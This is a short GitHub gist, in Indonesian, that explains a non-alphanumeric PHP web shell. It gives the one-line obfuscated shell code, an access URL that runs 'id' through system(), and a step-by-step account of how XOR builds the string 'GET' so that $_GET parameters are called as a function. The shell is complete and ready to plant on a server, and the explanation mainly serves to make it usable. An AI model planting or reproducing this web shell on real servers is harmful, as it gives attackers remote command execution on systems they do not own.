Skip to content

Instantly share code, notes, and snippets.

@vsec7
Created July 27, 2020 11:54
Show Gist options
  • Save vsec7/57346dbf78c3a1f426cc0970c8756636 to your computer and use it in GitHub Desktop.
Save vsec7/57346dbf78c3a1f426cc0970c8756636 to your computer and use it in GitHub Desktop.
Non-Alphanumeric WebShell PHP explaination

Non-Alphanumeric WebShell PHP

Code :

<?php $_='{';$_=($_^'<').($_^'>;').($_^'/');${'_'.$_}['_'](${'_'.$_}['__']);

Cara Akses :

shell.php?_=system&__=id

Penjelasan Singkat

Dilihat dari code nya terdapat 3 part flow nya.

part 1

$_='{'; 

variable $_ menampung string {

part 2

$_=($_^'<').($_^'>;').($_^'/');

** Note: Di PHP, $variable bs di reuse **

  • Manipulasi utk mendapatkan char yg diinginkan dengan XOR ^
($_^'<').($_^'>;').($_^'/');

Step awal kan var $_ menampung { Kita sederhanakan biar gampang dipahami:

echo ('{'^'<').('{'^'>;').('{'^'/');
output : GET

variable $_ di reuse dan ditimpa value nya jadi GET, sekarang variable $_ menampung string GET

Part 3

${'_'.$_}['_'](${'_'.$_}['__']);
${'_'.GET}['_'](${'_'.GET}['__']);
$_GET['_']($_GET['__'])

Sehingga jika diakses GET ?_=system&__=id

var _ menjadi function var __ menjadi value nya

system(id)

~ Ve

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment